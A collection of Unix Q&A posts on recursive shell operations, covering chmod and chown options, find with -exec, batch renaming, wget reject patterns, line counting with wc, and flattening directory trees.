Note: chmoding .git folder is throwing the following error
some_dir/.git/objects/pack/pack-dd149b11c4e5d205e3022836d49a972684de8daa.idx': Operation not permitted
I don't really need to chmod .git folders but unfortunately I can't remove them also in my case.
|
Not with chmod alone. You'll need to use find:
find some_dir -name '.?*' -prune -o -exec chmod 755 {} +
Or with zsh (or ksh93 -G, or with tcsh after set globstar) globbing:
chmod 755 -- some_dir some_dir/**/*
(you can also do that with fish or bash -O globstar, but beware that bash versions prior to 4.3 and fish follow symlinks when descending directories. It was partly fixed in bash 4.3 in that you'd still get the files in symlinks to directories but not anymore in subdirs of those as in 4.2, and fully fixed in 5.0)
Are you sure you want to make all the files executable though?
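Following up on that question: if the intent is the conventional 755 for directories and 644 for regular files (an assumption on my part; the question only mentions 755), both cases fit in a single find run while still pruning hidden names:

```shell
# 755 on directories, 644 on regular files, skipping anything whose name starts with a dot
find some_dir -name '.?*' -prune -o \
    -type d -exec chmod 755 {} + -o \
    -type f -exec chmod 644 {} +
```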
| How to exclude hidden files in recursive chmod? |
1,322,691,968,000 |
From the chown manpage:
The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect.
-H if a command line argument is a symbolic link to a directory, traverse it
-L traverse every symbolic link to a directory encountered
-P do not traverse any symbolic links (default)
What is the exact difference between the -H and -L options? As I understood it, -H allows for directory symlink traversal only when that directory is specified as argument, where -L traverses all directory symlinks in any case.
(These options apply only when chowning recursively using the -R option. In non-recursive mode, a directory symlink specified as argument is always traversed.) Is this correct?
|
Your understanding is correct; these options match the same options in find.
Thus
chown -R .
or
chown -R -P .
changes the owner recursively without de-referencing any symlinks;
chown -R -H *
changes the owner recursively, de-referencing any symlinks in the current directory (since they end up being part of the arguments) but
chown -R -H .
still doesn't de-reference any symlink, and finally
chown -R -L .
chown -R -L *
both de-reference symlinks.
(As an aside for the examples above, note that . and * don't necessarily result in the same outcome, depending on your shell's globbing options — * typically doesn't match dotfiles.)
| What is the difference between -H and -L options of chown? |
1,322,691,968,000 |
I have the following directory tree:
records/13/2014.12.16/00/05.mpg
records/13/2014.12.16/00/15.mpg
records/13/2014.12.16/01/05.mpg
records/13/2014.12.16/02/15.mpg
records/15/2014.12.14/05/25.mpg
etc.
I need to rename every file which has *5.mpg in its name to *0.mpg. So for example:
mv records/13/2014.12.16/00/05.mpg records/13/2014.12.16/00/00.mpg
mv records/13/2014.12.16/00/15.mpg records/13/2014.12.16/00/10.mpg
mv records/15/2014.12.14/05/25.mpg records/15/2014.12.14/05/20.mpg
etc.
I know that I'm gonna have to write a bash script to do that. Unfortunately I'm not good at it, that's why I'm asking you for help.
I guess that it will have to enter each directory (the recursive part) and move every file in that directory if its name contains *5.mpg.
|
Just loop through all *5.mpg files and use parameter expansion to change the filenames:
for file in *5.mpg; do mv -- "$file" "${file%5.mpg}"0.mpg; done
To do it for different directories set globstar option (shopt -s globstar in bash) and additionally take path component with dirname command or again using parameter expansion.
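Putting those two hints together, a recursive version might look like this (a sketch assuming bash ≥ 4 and that only regular files match the pattern):

```shell
# rename every *5.mpg to *0.mpg in this directory and all subdirectories
shopt -s globstar nullglob
for file in **/*5.mpg; do
    mv -- "$file" "${file%5.mpg}0.mpg"
done
```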
| Moving files recursively if certain condition is met |
1,322,691,968,000 |
I'm trying to get a site with wget. The problem is that it:
Have user friendly name for the pages
http://domain/wiki/Section/Home,
http://domain/wiki/Section/Not+Home
http://domain/wiki/Section/Other+page
For some pages it uses query strings:
http://domain/wiki/Section/Home?one=value&other=value
and for some reason maybe backup some files have an extension of .1 (number from 1 - n) for example styles.css.1, javascrip.js.2
I want to do a recursive download and store it in one folder but avoid the files with queries; Home?query – in this case Home. For this I've tried --reject with a pattern but I can't make it work.
I can avoid extension .1,.2,... .n if I add a long list of numbers, but there is hopefully a better way.
This is the wget:
wget \
--page-requisites \
--no-parent \
--no-host-directories \
--no-directories \
--convert-links \
--load-cookies wget_cookies.txt --cookies=on --keep-session-cookies \
-P WikiFolders/pages/ \
-e robots=off \
-r \
--reject='1,2,3,4,5,6,7,8,9,*\\?*' \
--content-disposition \
--no-check-certificate \
http://domain/wiki/Section/
If I run it this way I do get the site but is really slow for some content.
Note: to avoid files with queries I tried *\\?* but this doesn't work.
After I download I remove the content with:
find WikiFolders/pages/ -iname "*\\?*" -delete
but again this is really slow and I have to download lots of content.
I've thought on first exclude the HTML and download images, CSS and js and with other wget the HTML but since the files have no extension this doesn't work.
|
You can use the [] notation to specify ranges of numbers and letters. Repeat for multiple.
*[0-9],*[0-9][0-9],*[0-9][0-9][0-9]
|____||__________||_______________|
| | |
| | +---------- Reject ending with 000 to 999
| +------------------------- Reject ending with 00 to 99
+--------------------------------- Reject ending with 0 to 9
This can also be used with --accept.
For the query links there is no way to filter it out – however if you specify
*\?* the files will be deleted after they have been downloaded. So you would have to live with it using bandwidth and time for downloading, but you do not have to do a cleanup afterwards.
So, summa summarum, perhaps something like this:
--reject='*.[0-9],*.[0-9][0-9],*\?*'
If this does not suffice you would have to look into other tools like the one mentioned in possible duplicate link under your question.
| wget recursive with files without extension |
1,322,691,968,000 |
I'm migrating a directory of files containing fairly simple ASP code over to a PHP server and I need to modify the contents of all the files with a find and replace mechanism. I'm not great with regular expressions, but I've used this to change a few things already:
find . -name "*.php" -print0 | xargs -0 -n 1 sed -i -e 's/oldstring/newstring/g'
I have some complex strings I need to replace though. See the following:
FROM:
<% if request("page") = "" then %>
TO:
<?php if(!isset($_GET['page']) || !$_GET['page']){ ?>
This one, the * can be any number, then keep that number where the * is on the
"TO".
FROM:
<% elseif request("page") = "*" then %>
TO:
<?php } elseif($_GET['page'] == '*'){ ?>
And the last one is pretty simple.
FROM:
<% end if %>
TO:
<?php } ?>
If I can run this in bulk, recursively in a directory, this will fix 98% of all the ASP code in these files. I've tried to escape these strings in several ways, but cannot figure out how to get it to run. Any help is appreciated!
|
There are various ways of doing this, I would recommend taking advantage of Perl's quotemeta function.
First, make a tab separated text file containing the search patterns in the first column and their replacement in the second:
$ cat pats.txt
<% if request("page") = "" then %> <?php if(!isset($_GET['page']) || !$_GET['page']){ ?>
<% elseif request("page") = "*" then %> <?php } elseif($_GET['page'] == '*'){ ?>
<% end if %> <?php } ?>
I created a test file whose contents are:
$ cat foo.asp
<% if request("page") = "" then %>
<% elseif request("page") = "*" then %>
<% end if %>
And Perl to the rescue:
find . -name "*.php" | while IFS= read -r file; do
perl -i.bak -e 'open(A,"pats.txt");
while(<A>){chomp; @a=split(/\t/); $k{quotemeta($a[0])}=$a[1]}
while(<>){
foreach $pat (keys(%k)){
s/$pat/$k{$pat}/;
}
print}' "$file";
done
Perl's -i flag works just like in sed, you can specify an optional backup suffix. In the example above, a file called foo.php.bak will be created for each processed file. Use -i alone if you don't want the backups.
EXPLANATION:
The script will read the patterns and replacements and save the patterns as keys of a hash (%k) where the replacements are the values. The quotemeta function escapes all non-word characters (those not matching [A-Za-z_0-9]).
The script then opens each input file, looks for each pattern in each line and replaces accordingly. Since the search patterns have been escaped by quotemeta, they are matched literally.
NOTES
This is obviously not the most efficient way of doing this since it will have to look for each of the patterns on each line. Still, it works and is much simpler than mucking about trying to manually escape everything.
The script will fail for files with new lines in the names. I assume that won't be a problem here.
| Change some ASP code to PHP code in all files |
1,322,691,968,000 |
I need to recursively iterate through all the subdirectories of a folder.
Within the subdirectories, if there's a file with an extension '.xyz' then I need to run a specific command in that folder once.
Here's what I have so far
recursive() {
for d in *; do
if [ -d "$d" ]; then
(cd -- "$d" && recursive)
fi
dir=`pwd`
pattern="*.xyz"
file_count=$(find $dir -name $pattern | wc -l)
if [[ $file_count -gt 0 ]]; then
echo "Match found. Going to execute a command"
#execute command
fi
done
}
(cd /target; recursive)
But the problem is that the "Match found.." message is displayed more than once per folder when there's a match. Is there a simpler way to do this while fixing this problem?
|
find has a builtin flag to print strings, which is pretty useful here:
find -iname "*.xyz" -printf "%h\n" prints the names of all directories that contain a file that matches your pattern (the %h is just find's magic syntax that expands to the file directory and \n is, of course, a linebreak).
Therefore, this does what you want:
COMMAND='echo'
find `pwd` -iname "*.xyz" -printf "%h\n" | sort -u | while read i; do
cd "$i" && pwd && $COMMAND
done
There are a few things that are going on here. To execute commands only once, we just pipe it through sort with the -u flag, which drops all duplicate entries. Then we loop over everything with while. Also note that I used find `pwd`, which is a nice trick to make find output absolute paths, instead of relative ones, which allows us to use cd without having to worry about any relative paths.
Edit: Be careful with your directory names when executing this script, as directory names containing a newline (\n) or even just \ can break the script (maybe other uncommon characters too, but I haven't tested any more than that). Fixing this is hard and I don't know how to do it, so I can only suggest not using such directories.
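One way around that caveat, at least for newlines, is a null-delimited pipeline (a sketch assuming GNU find, GNU sort and bash):

```shell
COMMAND='echo'
# %h\0 emits each containing directory NUL-terminated; sort -zu deduplicates them
find "$PWD" -iname '*.xyz' -printf '%h\0' | sort -zu |
while IFS= read -r -d '' i; do
    cd "$i" && pwd && $COMMAND
done
```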
| Recursively iterate through all subdirectories, If a file with a specific extension exists then run a command in that folder once |
1,322,691,968,000 |
I use this commandline to convert jpegs to pdfs inside a folder.
for f in *.jpg; do echo "Converting $f"; convert "$f" "$(basename "$f" .jpg).pdf"; done
However, I would like to convert all .jpg files from several folders to .pdf, located inside the same folder. I need a bash command which says "go inside folder A, launch the conversion to pdf and when it is done, go to folder B and do the same".
Also jpeg file could be ended by .jpg or .JPG.
My folder structure is such as:
Folder A
File1.jpg
File1.jpg
File1.jpg
File1.jpg
File1.jpg
Folder B
File1.jpg
File1.jpg
File1.jpg
...
Any idea about how to achieve this?
|
Updated to allow file names *.jpg and *.JPG according to updated question:
Use -iname for case insensitive comparison, and variable expansion with pattern ${file%.[jJ][pP][gG]}. This will actually match .jpg in any capitalization, e.g. .JpG.
Assuming Folder A and Folder B are in the current directory and you want to do the same in all directories recursively:
find . -type f -iname \*.jpg | while read -r file
do
echo "Converting $file"
convert "$file" "${file%.[jJ][pP][gG]}.pdf"
done
Or if you want to specify the directory names
find "Folder A" "Folder B" -type f -iname \*.jpg | ...
If you don't have any subdirectories named *.jpg you can leave out the -type f.
If you don't want to do the conversion recursively in subdirectories of Folder A etc. you might have to add a -maxdepth condition.
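If the file names may themselves contain newlines, a null-delimited variant of the same loop (GNU find and bash assumed, ImageMagick's convert required) is safer:

```shell
find . -type f -iname '*.jpg' -print0 |
while IFS= read -r -d '' file; do
    echo "Converting $file"
    convert "$file" "${file%.[jJ][pP][gG]}.pdf"
done
```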
| Recursive conversion of jpeg files |
1,322,691,968,000 |
I am experiencing an issue with a indexing program running much longer than expected. I want to rule out the possibility of a recursive symbolic link. How could I find a symbolic link that is recursive at some level?
|
This related question, provides a way to identify a recursive symbolic link using the find command:
$ find -L .
.
./a
./a/b
./a/b/c
./a/b/c/d
find: File system loop detected; `./a/b/c/d/e' is part of the same file system loop as `./a/b'.
find: `./a/b/e': Too many levels of symbolic links
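To see that behaviour in action you can manufacture a loop in a scratch directory (a throwaway illustration; the names are arbitrary):

```shell
cd "$(mktemp -d)"
mkdir -p a/b
ln -s ../.. a/b/c        # c resolves back to the top directory: a cycle
find -L . 2>&1 | grep 'loop'
```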
| How could I quickly find a recursive symbolic link? [duplicate] |
1,322,691,968,000 |
I am using the following Linux command to recursively count lines of text files in a folders structure:
find . -name '*.txt' | xargs -d '\n' wc -l
This outputs all found files and their number of lines:
86 ./folder1/folder11/folder111/file1.txt
67 ./folder1/folder11/folder112/file2.txt
7665 ./folder1/folder11/folder113/file3.txt
..., etc.
1738958 total
There are a total of 24k+ files. The number of lines for each file is correct and all the files are processed. But the total number of lines is not correct.
Even for a sub-folder of this structure the total number of lines is much bigger. For example:
cd folder1/folder11
find . -name '*.txt' | xargs -d '\n' wc -l
gives at the end 23M lines:
22535346 total
The total number of all lines should be > 100M, not 1.7M. What am I missing here?
|
If you have GNU wc, use
find . -name "*.txt" -print0 | wc -l --files0-from -
The manual section for this option explains why what you were doing doesn't work:
‘--files0-from=file’
Disallow processing files named on the command line, and instead process those named in file file; each name being terminated by a zero byte (ASCII NUL). This is useful when the list of file names is so long that it may exceed a command line length limitation. In such cases, running wc via xargs is undesirable because it splits the list into pieces and makes wc print a total for each sublist rather than for the entire list. One way to produce a list of ASCII NUL terminated file names is with GNU find, using its -print0 predicate. If file is ‘-’ then the ASCII NUL terminated file names are read from standard input.
If your wc doesn't support this option, you could instead send the output through a simple script to extract all the "total" lines and add them up.
... | awk '$2=="total"{t=t+$1} END{print t " total"}'
| Wrong result when recursively count lines with wc |
1,322,691,968,000 |
I am currently trying to set all files with extensions .html in the current directory and all its subdirectories to be readable and writeable, and executable by their owner and only readable (not writeable or executable) by groups and others. However, some of the files have spaces in their name, which I am unsure how to deal with.
My first attempt:
chmod -Rv u+rw,go+r '* *.html'
When I tried my first attempt, I get the following message:
chmod: cannot access '* *.html': No such file or directory
failed to change mode of '* *.html' from 0000 (---------) to 0000 (---------)
My second attempt:
find . -type f -name "* *.html" | chmod -Rv u+rw,go+r
I added a pipe operator in order to send the find command's output to chmod. However, when I tried my second attempt, I get the following:
chmod: missing operand after ‘u+rw,go+r’
After my attempts, I'm still confused on how to deal with spaces in file names in order to change set permissions recursively. What is the best way to deal with this issue? Any feedback or suggestion is appreciated.
|
Use the -exec predicate of find:
find . -name '* *.html' -type f -exec chmod -v u+rw,go+r {} +
(here, adding rw-r--r-- permissions only as it makes little sense to add execute permissions to an html file as those are generally not meant to be executed. Replace + with = to set those permissions exactly instead of adding those bits to the current permissions).
You can also add a ! -perm -u=rw,go=r before the -exec to skip the files which already have (at least) those permissions.
With the sfind implementation of find (which is also the find builtin of the bosh shell), you can use the -chmod predicate followed by -chfile (which applies the changes):
sfind . -name '* *.html' -type f -chmod u+rw,go+r -chfile
(there, no need to add the ! -perm... as sfind's -chfile already skips the files that already have the right permissions).
That one is the most efficient because it doesn't involve executing a separate chmod command in a new process for every so many files but also because it avoids looking up the full path of every file twice (sfind calls the chmod() system call with the paths of the files relative to the directories sfind finds them during crawling, which means chmod() doesn't need to look up all the paths components leading to them again).
With zsh:
chmod -v -- u+rw,go+r **/*' '*.html(D.)
Here using the shell's recursive globbing and the D and . glob qualifiers to respectively include hidden files and restrict to regular files (like -type f does). Add ^f[u+rw,go+r] to also skip files which already have those permissions.
You can't use chmod's -R for that in combination with globs. Globs are expanded by the shell, not matched by chmod, so with chmod -Rv ... *' '*.html (note that those * must be left unquoted for the shell to interpret them as globbing operators), you'd just pass a list of html files to chmod and only if any of those files were directories would chmod recurse into them and change the permissions of all files in there.
| How do I handle file names with spaces when changing permissions for certain files in the current directory and all its subdirectories? |
1,322,691,968,000 |
I am on a system which deletes files which haven't been modified in 30 days. I need some way to preserve important files by marking them as being recently modifed. What is the best way I can do this? Something like for d in *; do; cat $d > $d ; done
|
cd to that directory, then use this command to mark only the files :
find . -type f -exec touch {} \;
or this command to mark even the directories :
find . -exec touch {} \;
After the execution, the files (and folders if you choose the 2nd command) will be marked that they were just changed, and their content won't be changed.
The advantage of this command that it will go recursive, even the subdirectories and the files under those subdirectories will be marked as changed.
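If touching everything feels too blunt, the same idea can be narrowed to files that are actually at risk (the 25-day threshold is my assumption, chosen to stay inside the 30-day purge window):

```shell
# refresh only regular files not modified in the last 25 days
find . -type f -mtime +25 -exec touch {} +
```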
| recursively mark all files in a directory as modified without changing file content |
1,322,691,968,000 |
I have the following directory structure in AIX.
codeRepo/REPO1/AREA1/objects
codeRepo/REPO1/AREA2/SUBAREA1/objects
codeRepo/REPO1/AREA2/SUBAREA2/objects
From codeRepo I want to run chown myUser * on each objects directory in the tree. As you can see there are various objects directories sitting in different places.
|
If you want to chown the directories only (and not the subfiles), use find -exec, as like:
find -type d -name objects -exec chown myUser {} \;
Going through this:
-type d selects only directories
-name objects looks only for directories named exactly "objects"
-exec chown myUser {} \; executes chown myUser {} for each path found (with {} replaced by the path)
If you want to also chown all the files inside as well, just replace chown with chown -R.
| Run a command over directories with name recursively |
1,322,691,968,000 |
I wanted to recursively run chmod go+w in a particular folder including hidden files, and I first tried
find . -name ".*" -o -name "*" -exec chmod go+w {} \;
but I found that it wasn't affecting hidden files. To check myself, I ran just
find . -name ".*" -o -name "*"
and the hidden files were listed. I also noticed that if I excluded the -o -name "*" part it would chmod the hidden files (but exclude non-hidden of course). My last attempt was to use xargs instead
find . -name ".*" -o -name "*" | xargs chmod go+w
which finally worked as expected. What am I doing wrong in the first snippet?
Red Hat Enterprise Linux Server release 6.8 (Santiago)
GNU bash, version 4.3.42(1)-release (x86_64-unknown-linux-gnu)
|
The solution is to bind the two name tests together with parens.
To illustrate this, let's consider a directory with three regular files:
$ ls -a
. .. .hidden1 .hidden2 not_hidden
Now, let's the original command:
$ find . -name ".*" -o -name "*" -exec echo Found {} \;
Found ./not_hidden
Only the non-hidden file is found.
Next, let's add parens to group the two name tests together:
$ find . \( -name ".*" -o -name "*" \) -exec echo Found {} \;
Found .
Found ./not_hidden
Found ./.hidden1
Found ./.hidden2
All files are found.
The solution is to use parens.
More details
In the original command, there is not operator between -name "*" and -exec ... \;. Consequently, find assumes the default operator which is logical-and. Because logical-and binds tighter than logical-or (-o), this means that the command is interpreted as:
find . \( -name ".*" \) -o \( -name "*" -exec echo Found {} \; \)
This means that the exec is run only if the first name condition failed to match.
For more information, see the OPERATORS section in man find.
What happens without -exec
Let's try using a simple -print:
$ find . -name ".*" -o -name "*" -print
./not_hidden
As you can see, -print bound to the -name "*" with the implicit logical-and as above.
But, consider what happens without any action specified:
$ find . -name ".*" -o -name "*"
.
./not_hidden
./.hidden1
./.hidden2
Here, all files were found. The reason is that, in this version, -o is the only operator.
| Different behaviors between find -exec and piping through xargs [duplicate] |
1,475,911,180,000 |
I want to run this bash command :
#!/bin/bash
rep="*"
for f in `ls -R`$rep; do
d='git log '$f'| wc -l'
c=$d
echo $c
done
how to excute a command git log myFile | wc -l from bash ?
ps : this command will return a number : git log myFile | wc -l
|
If you want to execute a command and get the output use the line below
d=`git log`
In your script you have to change two two things. I have the correct script below
#!/bin/bash
rep="*"
for f in `ls -R $rep`; do
d=`git log $f| wc -l`
c=$d
echo $c
done
Edit: The original correction is changing the quotes to backticks to make the output reach the d variable.
In addition, the $rep should be inside the backticks with the ls, otherwise it will add the * at the end of the last file name processed.
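A more defensive sketch (my variant, not the answer's): parsing ls -R output also picks up directory headers and blank lines, so letting find enumerate the files avoids that; here --oneline makes wc -l count commits rather than raw log lines:

```shell
# count commits touching each tracked-looking file, skipping .git internals
find . -type f -not -path './.git/*' | while IFS= read -r f; do
    c=$(git log --oneline -- "$f" | wc -l)
    echo "$f: $c"
done
```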
| Run a command on all the files in a directory tree and put the output into a variable |
1,475,911,180,000 |
How can I do a line count on all the PHP scripts within my webroot?
I am trying something like this below to no avail:
wc -l *.php
|
You need to use either a shell whose wildcard expansion includes subdirectories, or to stack another tool for directory traversal, such as find:
find -name "*.php" | xargs wc -l
If, OTOH, your goal is to sum it all, join the code first:
find -name "*.php" | xargs cat | wc -l
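Both pipelines break on names containing whitespace, and xargs may split very long lists so that wc prints several intermediate totals; a null-delimited sketch avoids both problems:

```shell
# whitespace-safe grand total across all .php files
find . -name '*.php' -print0 | xargs -0 cat | wc -l
```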
| line count on all the PHP scripts within my webroot with wc |
1,475,911,180,000 |
I have a large n-level directory structured as follows:
root
|
subdir1
|
sub_subdir1
|
....(n-2 levels).....
|
file1
|
subdir2
|
sub_subdir2
|
....(n-2 levels).....
|
file2
I want to flatten the directory so that all level 1 subdirs contain files. I also want to remove the level 2 to (n-1) sub_subdirs as they contain no files. Please note that the subdirs all have different names.
Desired Result
root
|
subdir1
|
file1
|
subdir2
|
file2
I have found a lot of posts explaining methods to flatten directories but none that explains how to do this in a controlled manner, i.e.,
by specifying the levels to be flattened
or doing it recursively for all sub_directories in a root directory
|
Using zsh:
cd /root
for subdir in subdir*
do
mv "$subdir"/**/*(.) "$subdir"
rm -r "$subdir"/*(/)
done
This:
changes to the "/root" directory (from your example)
loops over every subdirectory named subdir* (again from your example: matching subdir1 and subdir2)
moves the (expected one, but would match all) matching file(s) under that subdirectory into that subdirectory. This uses zsh's ** recursive globbing feature, limited then by the glob qualifier *(.) which says: any entry in this directory that's a plain file
after moving the file, recursively remove every subdirectory under that subdirectory; this again uses a zsh glob qualifier *(/) which says to match entries that are directories.
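A rough bash equivalent for shells without zsh's glob qualifiers (a sketch assuming bash ≥ 4, run from /root; note it silently overwrites on duplicate file names):

```shell
shopt -s globstar nullglob
for subdir in subdir*/; do
    # move every regular file from any depth below up into the level-1 subdir
    for f in "$subdir"*/**/*; do
        [ -f "$f" ] && mv -- "$f" "$subdir"
    done
    # then delete the now-empty intermediate directories
    find "$subdir" -mindepth 1 -type d -empty -delete
done
```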
| Recursively flattening subdirectories in a root directory and maintaining level 1 sub-directory structure |
1,475,911,180,000 |
I have the following file structure:
Some directory
Some file.txt
Another file here.log
Yet another file.mp3
Another directory
With some other file.txt
File on root level.txt
Another file on root level.ext
What I want to do now is run a little script that takes another file as input containing some type of pattern/replacement pairs in it to rename these files recursively according to them. So that every "another" (case insensitive) gets replaced with "foo" or every "some" with "bar."
I already tried a lot of things with iterating over files and reading said input file, but nothing worked like it should and I finally managed to accidentally overwrite my testing script. But there were a lot of ls, while, sed or mv in use.
The two things I couldn't resolve myself were how to handle whitespace in filenames and how to not handle files that were already renamed in a previous pattern match.
Maybe you can point me in the right direction?
|
TOP="`pwd -P`" \
find . -type d -exec sh -c '
for d
do
cd "$d" && \
find . ! -name . -prune -type f -exec sh -c '\''
while IFS=\; read -r pat repl
do
rename "s/$pat/$repl/g" "$@"
N=$#
for unmoved
do
if [ -f "$unmoved" ]
then
set X ${1+"$@"} "$unmoved"
shift
fi
done
shift "$N"
case $# in 0 ) break ;; esac
done < patterns.csv
'\'' x \{\} +
cd "$TOP"
done
' x {} +
Set up find to net directories only and hand them to sh in one gulp. This minimizes the number of invocations of sh.
Set up find in each of these directories to net regular files, at a depth level of 1 only, and feed them to sh in a gulp. This minimizes the number of times the rename utility gets to be called.
Set up a while loop to read-in the various pattern <-> replacement pairs and apply them on all the regular files.
In the process of rename-ing we keep a note on whether a file was still standing after the rename process. If we find that a file still exists then that means, for some reason, it could not be renamed and hence would be tried in the next pat/repl iteration. OTOH, if the file was successfully renamed, then we DON'T apply the next pat/repl iteration on this file, taking it away from the command line arguments list.
| Recursively rename files by using a list of patterns and replacements |
1,475,911,180,000 |
When I do chmod _+x -R /dir where "_" is any combination of (u,g,o,a), if after I do chmod g+X -R /dir, the files gain executable permissions as well.
Why does this happen? This behavior only happens if I use lower "x" first, then use upper "X".
First example:
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+x -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d--x------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d--x------. 2 root root 6 Apr 22 21:41 accounting
---x------. 1 user user 0 Apr 22 22:06 myfile1
---x------. 1 user finance 0 Apr 22 22:12 myfile2
---x------. 1 user user 0 Apr 22 22:12 myfile3
Here I only want to give group executable permission, but files also get executable permissions:
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d--x--x---. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d--x--x---. 2 root root 6 Apr 22 21:41 accounting
---x--x---. 1 user user 0 Apr 22 22:06 myfile1
---x--x---. 1 user finance 0 Apr 22 22:12 myfile2
---x--x---. 1 user user 0 Apr 22 22:12 myfile3
Another example:
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwx------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwx------. 2 root root 6 Apr 22 21:41 accounting
-rwx------. 1 user user 0 Apr 22 22:06 myfile1
-rwx------. 1 user finance 0 Apr 22 22:12 myfile2
-rwx------. 1 user user 0 Apr 22 22:12 myfile3
Again, I only want to give group executable permission, but files gain executable permissions as well.
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwx--x---. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwx--x---. 2 root root 6 Apr 22 21:41 accounting
-rwx--x---. 1 user user 0 Apr 22 22:06 myfile1
-rwx--x---. 1 user finance 0 Apr 22 22:12 myfile2
-rwx--x---. 1 user user 0 Apr 22 22:12 myfile3
Here is an example where "it works", but as you can see I did NOT use lowercase "x" prior to using uppercase "X":
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod a+rw -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rw-rw-. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rw-rw-. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rwxrw-. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rwxrw-. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod o+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rwxrwx. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rwxrwx. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwxrwxrwx. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwxrwxrwx. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
|
+X means to set the execute bit:
if the file is a directory or if the current (unmodified) file mode bits have at least one of the execute bits (S_IXUSR, S_IXGRP, or S_IXOTH) set. It shall be ignored if the file is not a directory and none of the execute bits are set in the current file mode bits.
Once you've run chmod -R _+x dir (for any of u, g or o), the execute bit is set for at least some of user/group/other on every file (that you have permission to modify). That means +X applies to all of those files as well.
If you only want to affect directories, and there are no other executable files in the tree, you can run the +X command before other modifications. Otherwise, you can use find:
find dir -type d -exec echo chmod g+x {} \+
That finds all directories (-type d) in dir and runs echo chmod g+x on them, with {} replaced by the paths. The echo makes this a dry run; remove it to actually apply the change.
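The difference is easy to reproduce in a scratch directory (all names here are invented for the demo):

```shell
mkdir -p demo_finance/accounting
: > demo_finance/report
chmod 600 demo_finance/report      # the file has no execute bit anywhere
chmod -R g+X demo_finance          # +X only touches the directories...
ls -l demo_finance/report          # ...the file is still -rw-------

chmod u+x demo_finance/report      # give the file one execute bit
chmod -R g+X demo_finance          # now +X matches the file too -> -rwx--x---

# To change only directories regardless of file modes, use find:
find demo_finance -type d -exec chmod g+x {} +
```

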